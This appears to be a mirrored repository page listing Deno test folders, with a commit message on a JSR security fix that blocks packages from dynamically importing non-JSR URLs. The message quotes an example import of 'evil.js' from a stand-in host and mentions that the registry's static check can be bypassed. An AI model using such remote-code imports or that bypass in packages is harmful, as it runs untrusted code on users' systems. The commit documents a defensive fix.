denoland-deno

mirror of https://github.com/denoland/deno.git synced 2024-12-02 17:01:14 -05:00

History

David Sherret 918c5e648f fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623 ) A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.		2024-02-28 16:30:45 -05:00
..
deps	chore: move cli/tests/ -> tests/ (#22369 )	2024-02-10 20:22:13 +00:00
import_https_url	fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623 )	2024-02-28 16:30:45 -05:00
module_graph	chore: move cli/tests/ -> tests/ (#22369 )	2024-02-10 20:22:13 +00:00
no_module_graph	chore: move cli/tests/ -> tests/ (#22369 )	2024-02-10 20:22:13 +00:00
registry/@denotest	fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623 )	2024-02-28 16:30:45 -05:00
subset_type_graph	chore: move cli/tests/ -> tests/ (#22369 )	2024-02-10 20:22:13 +00:00
version_not_found	chore: move cli/tests/ -> tests/ (#22369 )	2024-02-10 20:22:13 +00:00